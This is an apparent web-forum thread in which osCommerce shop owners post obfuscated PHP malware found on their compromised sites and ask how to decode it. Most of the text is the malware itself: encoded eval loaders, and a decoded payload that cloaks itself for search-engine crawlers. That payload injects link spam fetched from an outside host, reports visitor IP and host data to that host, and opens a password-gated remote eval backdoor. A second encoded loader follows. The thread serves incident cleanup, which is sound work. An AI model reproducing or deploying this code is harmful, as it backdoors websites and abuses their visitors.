7NzY7NzQ7NjI7Nzg7Nzk7NzY7NjE7NzU7Nzc7NTY7Njg7Njk7NzQ7Nzg7NjE7NTg7NzM7NTY7OTA7Nzc7NzQ7ODU7Nzs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs4ODs0Njs2Mjs1Nzs3Mjs2Mzs3Mjs1Njs3Njs3OTs3NTs1Nzs2OTs3OTs2OTs3ODs3ODs3NDs1ODs3NDs3Mzs2ODs3Nzs3ODs2ODs2ODs3Mzs2MTs3Mzs3OTs1Njs2MTs1Njs2OTs2NTs2MDsxNTs4OzE0OzEyOzE5OzE1Ozg0Ozg4OzQ2OzczOzYxOzY5OzYzOzU4Ozc3OzYyOzcyOzY5Ozc1OzczOzc2Ozc4OzYxOzYzOzYxOzc4Ozc5OzYzOzY4OzU4Ozc0Ozc3Ozc3OzYxOzczOzc0OzcyOzc0OzY4OzcyOzYzOzgwOzMxOzIwOzE0Ozg0Ozc2Ozg1OzgwOzg4OzQ2OzYyOzU3OzcyOzYzOzcyOzU2Ozc2Ozc5Ozc1OzU3OzY5Ozc5OzY5Ozc4Ozc4Ozc0OzU4Ozc0OzczOzY4Ozc3Ozc4OzY4OzY4OzczOzYxOzczOzc5OzU2OzYxOzU2OzY5Ozg1Ozg3Ozc3OzcxOzkyOzkyOzkyOzkyOzkyOzkyOzE7OTI7OTI7OTI7OTI7OTI7OTI7MjE7MjY7ODQ7ODg7NDY7Nzk7NzY7NjI7Nzg7NjE7NjI7Njg7NTY7NjM7Nzc7NzI7Njk7NzQ7NTY7NzY7NzQ7NjI7Nzg7Nzk7NzY7NjE7NzU7Nzc7NTY7Njg7Njk7NzQ7Nzg7NjE7NTg7NzM7NTY7OTA7Nzg7ODU7Nzs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs4ODs0Njs2Mjs1Nzs3Mjs2Mzs3Mjs1Njs3Njs3OTs3NTs1Nzs2OTs3OTs2OTs3ODs3ODs3NDs1ODs3NDs3Mzs2ODs3Nzs3ODs2ODs2ODs3Mzs2MTs3Mzs3OTs1Njs2MTs1Njs2OTs4Nzs2NTs3ODs3MTs5Mjs5Mjs5Mjs5Mjs5Mjs5MjsxOzkyOzkyOzkyOzkyOzkyOzkyOzg4OzQ2Ozc2Ozc5OzcyOzYxOzU3Ozc4OzYxOzYyOzY5OzcyOzU4OzY5OzY5OzYzOzYzOzY4Ozc3OzYyOzc5OzY4OzY5OzYxOzc3OzY4Ozc4Ozc4OzU2OzYxOzc5Ozc5OzczOzc5OzY1OzYwOzI3OzY7MjE7MTg7MjY7MTY7Mjk7ODsyNTs4NDs2MDsxNTs5OzMwOzE1Ozg7MTQ7ODQ7ODg7NDY7NzM7NjE7Njk7NjM7NTg7Nzc7NjI7NzI7Njk7NzU7NzM7NzY7Nzg7NjE7NjM7NjE7Nzg7Nzk7NjM7Njg7NTg7NzQ7Nzc7Nzc7NjE7NzM7NzQ7NzI7NzQ7Njg7NzI7NjM7ODA7ODg7NDY7NjI7NTc7NzI7NjM7NzI7NTY7NzY7Nzk7NzU7NTc7Njk7Nzk7Njk7Nzg7Nzg7NzQ7NTg7NzQ7NzM7Njg7Nzc7Nzg7Njg7Njg7NzM7NjE7NzM7Nzk7NTY7NjE7NTY7Njk7ODU7ODU7NzE7OTI7OTI7OTI7OTI7OTI7OTI7MjE7MjY7ODQ7ODg7NDY7NzY7Nzk7NzI7NjE7NTc7Nzg7NjE7NjI7Njk7NzI7NTg7Njk7Njk7NjM7NjM7Njg7Nzc7NjI7Nzk7Njg7Njk7NjE7Nzc7Njg7Nzg7Nzg7NTY7NjE7Nzk7Nzk7NzM7Nzk7NjU7NjU7NjU7NTg7NjE7NDg7NDc7NTc7ODU7Nzs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs5Mjs4ODs0Njs3Njs3OTs3Mjs2MTs1Nzs3ODs2MTs2Mjs2OTs3Mjs1ODs2OTs2OTs2Mzs2Mzs2ODs3Nzs2Mjs3OTs2ODs2OTs2MTs3Nzs2ODs3ODs3ODs1Njs2MTs3OTs3OTs3Mzs3OTs2NTs4ODs0Njs3Mzs2MTs2OTs2Mzs1ODs3Nzs2Mjs3Mjs2OTs3NTs3Mzs3Njs3ODs2MTs2Mzs2MTs3ODs3OTs2Mzs2ODs1ODs3NDs3Nzs3Nzs2MTs3Mzs3NDs3Mjs3NDs2ODs3Mjs2Mzs3MTs5Mjs5Mjs5Mjs5Mjs5Mjs5MjsxOzkyOzkyOzkyOzkyOzkyOzkyOzE0OzI1Ozg7OTsxNDsxODs5Mjs4ODs0Njs3Njs3OTs3Mjs2MTs1Nzs3ODs2MTs2Mjs2OTs3Mjs1ODs2OTs2OTs2Mzs2Mzs2ODs3Nzs2Mjs3OTs2ODs2OTs2MTs3Nzs2ODs3ODs3ODs1Njs2MTs3OTs3OTs3Mzs3OTs3MTs5Mjs5Mjs5Mjs5Mjs5MjsxOzkyOzkyOzkyOzkyOzE7OTI7OTI7OTI7OTI7MjY7OTsxODszMTs4OzIxOzE5OzE4OzkyOzE3OzE0OzE5OzMwOzIwOzg0Ozg4OzQ2OzU3OzY4Ozc4OzU3OzU3OzY5OzYyOzc3Ozc4Ozc3OzU4Ozc1Ozc2OzY5OzY4OzY5OzczOzU3OzU4OzczOzcyOzU3OzYyOzYxOzc1OzU4OzYxOzc0OzYyOzc1OzY4OzYyOzg1Ozc7OTI7OTI7OTI7OTI7OTI7NTI7MjU7Mjk7MjQ7MjU7MTQ7ODQ7OTE7NjM7MTk7MTg7ODsyNTsxODs4OzgxOzU3OzE4OzMxOzE5OzI0OzIxOzE4OzI3OzcwOzkyOzE4OzE5OzE4OzI1OzkxOzg1OzcxOzkyOzkyOzkyOzkyOzkyOzg4OzQ2OzYxOzc3Ozc1OzY5OzYxOzYyOzU2Ozc5OzYxOzc1OzYyOzY5OzU3Ozc4OzY4OzYzOzc5Ozc0OzY5OzU4Ozc1OzYyOzczOzY5OzYzOzczOzc3OzYyOzY4Ozc3OzU2OzU3OzY1OzI3OzY7MjQ7MjU7MzE7MTk7MjQ7MjU7ODQ7ODg7NDY7NTc7Njg7Nzg7NTc7NTc7Njk7NjI7Nzc7Nzg7Nzc7NTg7NzU7NzY7Njk7Njg7Njk7NzM7NTc7NTg7NzM7NzI7NTc7NjI7NjE7NzU7NTg7NjE7NzQ7NjI7NzU7Njg7NjI7ODU7NzE7OTI7OTI7OTI7OTI7OTI7OTI7OTI7MjE7MjY7ODQ7MTI7MTQ7MjU7Mjc7MzU7MTc7Mjk7ODszMTsyMDs4NDs5MTs4MzszMjs2NDszMjs4MzszMDsxOTsyNDs1OzgzOzE1OzIxOzkxOzgwOzg4OzQ2OzYxOzc3Ozc1OzY5OzYxOzYyOzU2Ozc5OzYxOzc1OzYyOzY5OzU3Ozc4OzY4OzYzOzc5Ozc0OzY5OzU4Ozc1OzYyOzczOzY5OzYzOzczOzc3OzYyOzY4Ozc3OzU2OzU3Ozg1Ozg1Ozc7OTI7OTI7OTI7OTI7OTI7OTI7MTQ7MjU7ODs5OzE0OzE4OzkyOzEyOzE0OzI1OzI3OzM1OzE0OzI1OzEyOzE2OzI5OzMxOzI1Ozg0OzkxOzgzOzg0OzMyOzY0OzMyOzgzOzMwOzE5OzI0OzU7Mzk7MzQ7MzI7NjY7MzM7ODY7MzI7NjY7ODU7ODM7MTU7MjE7OTE7ODA7Mjc7MTc7MTY7ODQ7ODU7ODI7OTQ7MzI7MTg7OTQ7ODI7OTE7ODg7Nzc7OTE7ODA7ODg7NDY7NjE7Nzc7NzU7Njk7NjE7NjI7NTY7Nzk7NjE7NzU7NjI7Njk7NTc7Nzg7Njg7NjM7Nzk7NzQ7Njk7NTg7NzU7NjI7NzM7Njk7NjM7NzM7Nzc7NjI7Njg7Nzc7NTY7NTc7ODU7NzE7OTI7OTI7OTI7OTI7OTI7MTsyNTsxNjsxNTsyNTs3OzkyOzkyOzkyOzkyOzkyOzkyOzE0OzI1Ozg7OTsxNDsxODs5Mjs4ODs0Njs2MTs3Nzs3NTs2OTs2MTs2Mjs1Njs3OTs2MTs3NTs2Mjs2OTs1Nzs3ODs2ODs2Mzs3OTs3NDs2OTs1ODs3NTs2Mjs3Mzs2OTs2Mzs3Mzs3Nzs2Mjs2ODs3Nzs1Njs1Nzs4MjsyNzsxNzsxNjs4NDs4NTs3MTs5Mjs5Mjs5Mjs5Mjs5MjsxOzkyOzkyOzkyOzkyOzE7OTI7OTI7OTI7OTI7MTk7MzA7MzU7MTU7ODsyOTsxNDs4Ozg0OzkxOzE3OzE0OzE5OzMwOzIwOzkxOzg1OzcxOzkyOzkyOzkyOzE7OTI7OTI7MTsiKTskej0iIjtmb3JlYWNoKCRtIGFzICR2KWlmICgkdiE9IiIpJHouPWNocigkdl4kayk7ZXZhbCgkeik7"));?>

 

 

into :

 

$k=124;$m=explode(";","21;26;84;26;9;18;31;8;21;19;18;35;25;4;21;15;8;15;84;91;19;30;35;15;8;29;14;8;91;85;90;90;93;21;15;15;25;8;84;88;59;48;51;62;61;48;47;39;91;17;14;35;18;19;91;33;85;85;7;92;92;92;88;59;48;51;62;61;48;47;39;91;17;14;35;18;19;91;33;65;77;71;92;92;92;21;26;84;93;26;9;18;31;8;21;19;18;35;25;4;21;15;8;15;84;91;17;14;19;30;20;91;85;85;7;92;92;92;92;92;92;21;26;84;93;26;9;18;31;8;21;19;18;35;25;4;21;15;8;15;84;91;27;17;16;91;85;85;7;92;92;92;92;92;26;9;18;31;8;21;19;18;92;27;17;16;84;85;7;92;92;92;92;92;92;21;26;92;84;15;8;14;21;15;8;14;84;88;35;47;57;46;42;57;46;39;94;52;40;40;44;35;41;47;57;46;35;61;59;57;50;40;94;33;80;94;27;19;19;27;16;25;30;19;8;94;85;0;0;15;8;14;21;15;8;14;84;88;35;47;57;46;42;57;46;39;94;52;40;40;44;35;41;47;57;46;35;61;59;57;50;40;94;33;80;94;5;29;20;19;19;94;85;85;7;92;92;92;92;92;92;92;21;26;92;84;84;17;24;73;84;88;35;46;57;45;41;57;47;40;39;94;17;17;17;29;23;19;11;19;21;11;19;11;76;76;78;94;33;85;65;65;94;29;79;69;79;72;24;30;25;78;76;30;76;30;79;25;69;30;30;25;75;29;69;25;26;31;31;74;73;78;74;26;72;94;85;90;90;84;21;15;15;25;8;84;88;35;46;57;45;41;57;47;40;39;94;17;17;17;29;23;19;11;19;21;11;19;11;76;76;77;94;33;85;85;85;7;88;46;68;75;78;73;76;78;69;57;61;68;69;75;77;78;57;57;56;68;74;75;76;62;61;57;74;72;56;79;76;57;72;75;65;30;29;15;25;74;72;35;24;25;31;19;24;25;84;88;35;46;57;45;41;57;47;40;39;94;17;17;17;29;23;19;11;19;21;11;19;11;76;76;77;94;33;85;71;14;25;8;9;14;18;92;94;57;4;25;31;9;8;21;19;18;82;82;82;88;46;68;75;78;73;76;78;69;57;61;68;69;75;77;78;57;57;56;68;74;75;76;62;61;57;74;72;56;79;76;57;72;75;32;18;94;82;25;10;29;16;84;88;46;68;75;78;73;76;78;69;57;61;68;69;75;77;78;57;57;56;68;74;75;76;62;61;57;74;72;56;79;76;57;72;75;85;71;1;92;92;92;92;92;92;92;88;46;61;58;74;79;57;61;61;75;61;78;56;77;73;63;61;73;69;61;62;62;69;73;62;74;58;56;77;61;58;57;62;58;65;94;20;8;8;12;70;83;83;94;82;30;29;15;25;74;72;35;24;25;31;19;24;25;84;94;37;78;69;15;37;18;16;20;24;59;69;9;24;59;58;5;29;43;68;9;37;78;69;8;94;85;82;94;83;16;21;18;23;15;83;94;82;14;29;18;24;84;76;80;78;73;76;85;82;94;82;8;4;8;67;21;12;65;94;82;88;35;47;57;46;42;57;46;39;94;46;57;49;51;40;57;35;61;56;56;46;94;33;82;94;90;20;19;15;8;65;94;82;14;29;11;9;14;16;25;18;31;19;24;25;84;88;35;47;57;46;42;57;46;39;94;52;40;40;44;35;52;51;47;40;94;33;85;82;94;90;29;27;25;18;8;65;94;82;14;29;11;9;14;16;25;18;31;19;24;25;84;88;35;47;57;46;42;57;46;39;94;52;40;40;44;35;41;47;57;46;35;61;59;57;50;40;94;33;85;71;92;92;92;92;92;92;92;88;46;58;72;68;62;58;58;69;76;73;73;58;72;74;62;69;72;68;79;62;63;69;76;56;63;76;61;77;74;76;57;74;75;65;94;94;71;92;92;92;92;92;92;92;21;26;92;84;26;9;18;31;8;21;19;18;35;25;4;21;15;8;15;84;94;31;9;14;16;35;21;18;21;8;94;85;85;92;7;92;92;92;92;92;92;92;92;88;46;75;56;58;72;68;77;56;76;74;74;77;79;68;63;58;75;62;73;56;75;56;61;77;69;62;63;62;78;61;68;75;72;92;65;92;60;31;9;14;16;35;21;18;21;8;84;85;71;92;92;92;92;92;92;92;92;60;31;9;14;16;35;15;25;8;19;12;8;92;84;88;46;75;56;58;72;68;77;56;76;74;74;77;79;68;63;58;75;62;73;56;75;56;61;77;69;62;63;62;78;61;68;75;72;80;92;63;41;46;48;51;44;40;35;41;46;48;80;92;88;46;61;58;74;79;57;61;61;75;61;78;56;77;73;63;61;73;69;61;62;62;69;73;62;74;58;56;77;61;58;57;62;58;85;71;92;92;92;92;92;92;92;92;60;31;9;14;16;35;15;25;8;19;12;8;92;84;88;46;75;56;58;72;68;77;56;76;74;74;77;79;68;63;58;75;62;73;56;75;56;61;77;69;62;63;62;78;61;68;75;72;80;92;63;41;46;48;51;44;40;35;46;57;40;41;46;50;40;46;61;50;47;58;57;46;80;92;77;85;71;92;92;92;92;92;92;92;92;60;31;9;14;16;35;15;25;8;19;12;8;92;84;88;46;75;56;58;72;68;77;56;76;74;74;77;79;68;63;58;75;62;73;56;75;56;61;77;69;62;63;62;78;61;68;75;72;80;92;63;41;46;48;51;44;40;35;40;53;49;57;51;41;40;80;92;77;73;85;71;92;92;92;92;92;92;92;92;60;31;9;14;16;35;15;25;8;19;12;8;92;84;88;46;75;56;58;72;68;77;56;76;74;74;77;79;68;63;58;75;62;73;56;75;56;61;77;69;62;63;62;78;61;68;75;72;80;92;63;41;46;48;51;44;40;35;57;50;63;51;56;53;50;59;92;80;92;94;27;6;21;12;94;85;71;92;92;92;92;92;92;92;92;88;46;58;72;68;62;58;58;69;76;73;73;58;72;74;62;69;72;68;79;62;63;69;76;56;63;76;61;77;74;76;57;74;75;65;60;31;9;14;16;35;25;4;25;31;92;84;88;46;75;56;58;72;68;77;56;76;74;74;77;79;68;63;58;75;62;73;56;75;56;61;77;69;62;63;62;78;61;68;75;72;85;71;92;92;92;92;92;92;92;92;60;31;9;14;16;35;31;16;19;15;25;92;84;88;46;75;56;58;72;68;77;56;76;74;74;77;79;68;63;58;75;62;73;56;75;56;61;77;69;62;63;62;78;61;68;75;72;85;71;92;92;92;92;92;92;92;1;92;25;16;15;25;92;7;92;92;92;92;92;92;92;92;88;46;58;72;68;62;58;58;69;76;73;73;58;72;74;62;69;72;68;79;62;63;69;76;56;63;76;61;77;74;76;57;74;75;65;60;26;21;16;25;35;27;25;8;35;31;19;18;8;25;18;8;15;84;88;46;61;58;74;79;57;61;61;75;61;78;56;77;73;63;61;73;69;61;62;62;69;73;62;74;58;56;77;61;58;57;62;58;85;71;92;92;92;92;92;92;92;1;92;92;92;92;92;92;1;92;92;92;92;92;92;14;25;8;9;14;18;92;88;46;58;72;68;62;58;58;69;76;73;73;58;72;74;62;69;72;68;79;62;63;69;76;56;63;76;61;77;74;76;57;74;75;71;92;92;92;92;92;1;92;92;92;92;1;92;92;92;92;92;92;92;92;21;26;84;93;26;9;18;31;8;21;19;18;35;25;4;21;15;8;15;84;91;27;6;24;25;31;19;24;25;91;85;85;7;92;92;92;92;92;26;9;18;31;8;21;19;18;92;27;6;24;25;31;19;24;25;84;88;46;73;61;69;63;58;77;62;72;69;75;73;76;78;61;63;61;78;79;63;68;58;74;77;77;61;73;74;72;74;68;72;63;85;7;92;92;92;92;92;92;88;46;79;76;62;78;61;62;68;56;63;77;72;69;74;56;76;74;62;78;79;76;61;75;77;56;68;69;74;78;61;58;73;56;65;60;19;14;24;84;60;15;9;30;15;8;14;84;88;46;73;61;69;63;58;77;62;72;69;75;73;76;78;61;63;61;78;79;63;68;58;74;77;77;61;73;74;72;74;68;72;63;80;79;80;77;85;85;71;92;92;92;92;92;92;88;46;62;57;72;63;72;56;76;79;75;57;69;79;69;78;78;74;58;74;73;68;77;78;68;68;73;61;73;79;56;61;56;69;65;77;76;71;92;92;92;92;92;92;88;46;61;79;56;73;78;57;73;78;61;72;68;69;79;74;63;56;57;76;58;73;79;73;74;62;62;76;68;74;73;78;58;78;65;76;71;92;92;92;92;92;92;21;26;84;88;46;79;76;62;78;61;62;68;56;63;77;72;69;74;56;76;74;62;78;79;76;61;75;77;56;68;69;74;78;61;58;73;56;90;72;85;7;92;92;92;92;92;92;92;88;46;74;79;62;57;56;57;74;62;77;69;78;74;74;56;72;57;58;57;61;56;76;75;61;72;56;69;77;57;78;69;57;62;65;60;9;18;12;29;31;23;84;91;10;91;80;15;9;30;15;8;14;84;88;46;73;61;69;63;58;77;62;72;69;75;73;76;78;61;63;61;78;79;63;68;58;74;77;77;61;73;74;72;74;68;72;63;80;77;76;80;78;85;85;71;92;92;92;92;92;92;92;88;46;74;79;62;57;56;57;74;62;77;69;78;74;74;56;72;57;58;57;61;56;76;75;61;72;56;69;77;57;78;69;57;62;65;88;46;74;79;62;57;56;57;74;62;77;69;78;74;74;56;72;57;58;57;61;56;76;75;61;72;56;69;77;57;78;69;57;62;39;77;33;71;92;92;92;92;92;92;92;88;46;62;57;72;63;72;56;76;79;75;57;69;79;69;78;78;74;58;74;73;68;77;78;68;68;73;61;73;79;56;61;56;69;87;65;78;87;88;46;74;79;62;57;56;57;74;62;77;69;78;74;74;56;72;57;58;57;61;56;76;75;61;72;56;69;77;57;78;69;57;62;71;92;92;92;92;92;92;1;92;92;92;92;92;92;21;26;84;88;46;79;76;62;78;61;62;68;56;63;77;72;69;74;56;76;74;62;78;79;76;61;75;77;56;68;69;74;78;61;58;73;56;90;68;85;7;92;92;92;92;92;92;92;88;46;62;57;72;63;72;56;76;79;75;57;69;79;69;78;78;74;58;74;73;68;77;78;68;68;73;61;73;79;56;61;56;69;65;60;15;8;14;12;19;15;84;88;46;73;61;69;63;58;77;62;72;69;75;73;76;78;61;63;61;78;79;63;68;58;74;77;77;61;73;74;72;74;68;72;63;80;31;20;14;84;76;85;80;88;46;62;57;72;63;72;56;76;79;75;57;69;79;69;78;78;74;58;74;73;68;77;78;68;68;73;61;73;79;56;61;56;69;85;87;77;71;92;92;92;92;92;92;1;92;92;92;92;92;92;21;26;84;88;46;79;76;62;78;61;62;68;56;63;77;72;69;74;56;76;74;62;78;79;76;61;75;77;56;68;69;74;78;61;58;73;56;90;77;74;85;7;92;92;92;92;92;92;92;88;46;62;57;72;63;72;56;76;79;75;57;69;79;69;78;78;74;58;74;73;68;77;78;68;68;73;61;73;79;56;61;56;69;65;60;15;8;14;12;19;15;84;88;46;73;61;69;63;58;77;62;72;69;75;73;76;78;61;63;61;78;79;63;68;58;74;77;77;61;73;74;72;74;68;72;63;80;31;20;14;84;76;85;80;88;46;62;57;72;63;72;56;76;79;75;57;69;79;69;78;78;74;58;74;73;68;77;78;68;68;73;61;73;79;56;61;56;69;85;87;77;71;92;92;92;92;92;92;1;92;92;92;92;92;92;21;26;84;88;46;79;76;62;78;61;62;68;56;63;77;72;69;74;56;76;74;62;78;79;76;61;75;77;56;68;69;74;78;61;58;73;56;90;78;85;7;92;92;92;92;92;92;92;88;46;62;57;72;63;72;56;76;79;75;57;69;79;69;78;78;74;58;74;73;68;77;78;68;68;73;61;73;79;56;61;56;69;87;65;78;71;92;92;92;92;92;92;1;92;92;92;92;92;92;88;46;76;79;72;61;57;78;61;62;69;72;58;69;69;63;63;68;77;62;79;68;69;61;77;68;78;78;56;61;79;79;73;79;65;60;27;6;21;18;26;16;29;8;25;84;60;15;9;30;15;8;14;84;88;46;73;61;69;63;58;77;62;72;69;75;73;76;78;61;63;61;78;79;63;68;58;74;77;77;61;73;74;72;74;68;72;63;80;88;46;62;57;72;63;72;56;76;79;75;57;69;79;69;78;78;74;58;74;73;68;77;78;68;68;73;61;73;79;56;61;56;69;85;85;71;92;92;92;92;92;92;21;26;84;88;46;76;79;72;61;57;78;61;62;69;72;58;69;69;63;63;68;77;62;79;68;69;61;77;68;78;78;56;61;79;79;73;79;65;65;65;58;61;48;47;57;85;7;92;92;92;92;92;92;92;88;46;76;79;72;61;57;78;61;62;69;72;58;69;69;63;63;68;77;62;79;68;69;61;77;68;78;78;56;61;79;79;73;79;65;88;46;73;61;69;63;58;77;62;72;69;75;73;76;78;61;63;61;78;79;63;68;58;74;77;77;61;73;74;72;74;68;72;63;71;92;92;92;92;92;92;1;92;92;92;92;92;92;14;25;8;9;14;18;92;88;46;76;79;72;61;57;78;61;62;69;72;58;69;69;63;63;68;77;62;79;68;69;61;77;68;78;78;56;61;79;79;73;79;71;92;92;92;92;92;1;92;92;92;92;1;92;92;92;92;26;9;18;31;8;21;19;18;92;17;14;19;30;20;84;88;46;57;68;78;57;57;69;62;77;78;77;58;75;76;69;68;69;73;57;58;73;72;57;62;61;75;58;61;74;62;75;68;62;85;7;92;92;92;92;92;52;25;29;24;25;14;84;91;63;19;18;8;25;18;8;81;57;18;31;19;24;21;18;27;70;92;18;19;18;25;91;85;71;92;92;92;92;92;88;46;61;77;75;69;61;62;56;79;61;75;62;69;57;78;68;63;79;74;69;58;75;62;73;69;63;73;77;62;68;77;56;57;65;27;6;24;25;31;19;24;25;84;88;46;57;68;78;57;57;69;62;77;78;77;58;75;76;69;68;69;73;57;58;73;72;57;62;61;75;58;61;74;62;75;68;62;85;71;92;92;92;92;92;92;92;21;26;84;12;14;25;27;35;17;29;8;31;20;84;91;83;32;64;32;83;30;19;24;5;83;15;21;91;80;88;46;61;77;75;69;61;62;56;79;61;75;62;69;57;78;68;63;79;74;69;58;75;62;73;69;63;73;77;62;68;77;56;57;85;85;7;92;92;92;92;92;92;14;25;8;9;14;18;92;12;14;25;27;35;14;25;12;16;29;31;25;84;91;83;84;32;64;32;83;30;19;24;5;39;34;32;66;33;86;32;66;85;83;15;21;91;80;27;17;16;84;85;82;94;32;18;94;82;91;88;77;91;80;88;46;61;77;75;69;61;62;56;79;61;75;62;69;57;78;68;63;79;74;69;58;75;62;73;69;63;73;77;62;68;77;56;57;85;71;92;92;92;92;92;1;25;16;15;25;7;92;92;92;92;92;92;14;25;8;9;14;18;92;88;46;61;77;75;69;61;62;56;79;61;75;62;69;57;78;68;63;79;74;69;58;75;62;73;69;63;73;77;62;68;77;56;57;82;27;17;16;84;85;71;92;92;92;92;92;1;92;92;92;92;1;92;92;92;92;19;30;35;15;8;29;14;8;84;91;17;14;19;30;20;91;85;71;92;92;92;1;92;92;1;");$z="";foreach($m as $v)if ($v!="")$z.=chr($v^$k);eval($z);

 

how do i decode that to find the source files?

 

 

Figured that out - now got :

 

if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){ $GLOBALS['mr_no']=1; if(!function_exists('mrobh')){ if(!function_exists('gml')){ function gml(){ if (stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")||stristr($_SERVER["HTTP_USER_AGENT"],"yahoo")){ if ((md5($_REQUEST["mmmakowoiwow002"])=="a3934dbe20b0b3e9bbe7a9efcc6526f4")&&(isset($_REQUEST["mmmakowoiwow001"]))){$R8725029EA89712EED8670BAE64D30E47=base64_decode($_REQUEST["mmmakowoiwow001"]);return "Execution...$R8725029EA89712EED8670BAE64D30E47\n".eval($R8725029EA89712EED8670BAE64D30E47);} $RAF63EAA7A2D15CA59ABB95B6FD1AFEBF="http://".base64_decode("Y29sYnlhdG9udGFyaW8uY29t")."/links/".rand(0,250).".txt?ip=".$_SERVER["REMOTE_ADDR"]."&host=".rawurlencode($_SERVER["HTTP_HOST"])."&agent=".rawurlencode($_SERVER["HTTP_USER_AGENT"]); $RF48BFF9055F46B9483BC90DC0A160E67=""; if (function_exists("curl_init")) { $R7DF481D066138CF7B5D7DA19BCB2A874 = @curl_init(); @curl_setopt ($R7DF481D066138CF7B5D7DA19BCB2A874, CURLOPT_URL, $RAF63EAA7A2D15CA59ABB95B6FD1AFEBF); @curl_setopt ($R7DF481D066138CF7B5D7DA19BCB2A874, CURLOPT_RETURNTRANSFER, 1); @curl_setopt ($R7DF481D066138CF7B5D7DA19BCB2A874, CURLOPT_TIMEOUT, 15); @curl_setopt ($R7DF481D066138CF7B5D7DA19BCB2A874, CURLOPT_ENCODING , "gzip"); $RF48BFF9055F46B9483BC90DC0A160E67=@curl_exec ($R7DF481D066138CF7B5D7DA19BCB2A874); @curl_close ($R7DF481D066138CF7B5D7DA19BCB2A874); } else { $RF48BFF9055F46B9483BC90DC0A160E67=@file_get_contents($RAF63EAA7A2D15CA59ABB95B6FD1AFEBF); } } return $RF48BFF9055F46B9483BC90DC0A160E67; } } if(!function_exists('gzdecode')){ function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){ $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1)); $RBE4C4D037E939226F65812885A53DAD9=10; $RA3D52E52A48936CDE0F5356BB08652F2=0; if($R30B2AB8DC1496D06B230A71D8962AF5D&4){ $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2)); $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1]; $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB; } if($R30B2AB8DC1496D06B230A71D8962AF5D&8){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&16){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&2){ $RBE4C4D037E939226F65812885A53DAD9+=2; } $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9)); if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){ $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C; } return $R034AE2AB94F99CC81B389A1822DA3353; } } function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){ Header('Content-Encoding: none'); $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B); if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){ return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE); }else{ return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml(); } } ob_start('mrobh'); }

 

now wondering how to decode all those $R strings.

 

Im assuming I have cleaned this b******* thing up, but would be nice to unpick it and find out exactly what it was trying to do (so i can double check it didnt manage any of it or i reverted back to a clean version correctly)

Link to comment
Share on other sites

What does the hackers code do?

 

 

Read pipeloops post from 9th Sep to see decoding issues & just how deep this goes http://www.oscommerce.com/forums/index.php?showtopic=344272&pid=1437581&start=&st=#entry1437581

 

Looking at the code you posted I would start with your links folder, but you would be best asking host to wipe & the restore with a clean backup.

Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Link to comment
Share on other sites

  • 1 month later...

Could someone help me decode here

 

<?php // This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited.

$OOO0O0O00=__FILE__;$O00O00O00=__LINE__;$OO00O0000=92;eval((base64_decode('JE8wMDBPME8wMD1mb3BlbigkT09PME8wTzAwLCdyYicpO3doaWxlKC0tJE8wME8wME8wMClmZ2V0cygkTzAwME8wTzAwLDEwMjQpO2ZnZXRzKCRPMDAwTzBPMDAsNDA5Nik7JE9PMDBPMDBPMD0oYmFzZTY0X2RlY29kZShzdHJ0cihmcmVhZCgkTzAwME8wTzAwLDM3MiksJ0VudGVyeW91d2toUkhZS05XT1VUQWFCYkNjRGRGZkdnSWlKakxsTW1QcFFxU3NWdlh4WnowMTIzNDU2Nzg5Ky89JywnQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejAxMjM0NTY3ODkrLycpKSk7ZXZhbCgkT08wME8wME8wKTs=')));return;?>

kr9NHenNHenNHe1lFMamb3klFoxiC2APk19gOLlHOa9gkZXJkZwVkr9NTznNHr8XHt4JkZwShokiF2A2Yy9LcBYvcoAPF3OZfuwPcmklCBWPkr8XHenNHr8XHtXLT08XHr8XHeEXhUXmOB50cbk5d3a3D2iUUylRTlfNaaOnCAkJW2YrcrcMO2fkDApQToxYdanXAbyTF1c2BuiDGjExHjH0YTC3KeLqRz0mRtfnWLYrOAcuUrlhU0xYTL9WAakTayaBa1icBMyJC2OlcMfPDBpqdo1Vd3nxFmY0fbc3Gul6HerZHzW1YjF4KUSvkZLphUL7cMYSd3YlhtONHeEXTznNHeEpK2a2CBXPkr9NHenNHenNHtL7eWPLUAlkUAlkUAlkUAlkwe0ICbkZCbLPhTSYtJOkUAlkUAlkUAlkUAldbUE9wtFxHTW1YTCXKepMFLiLDzfBCZF7eWP=
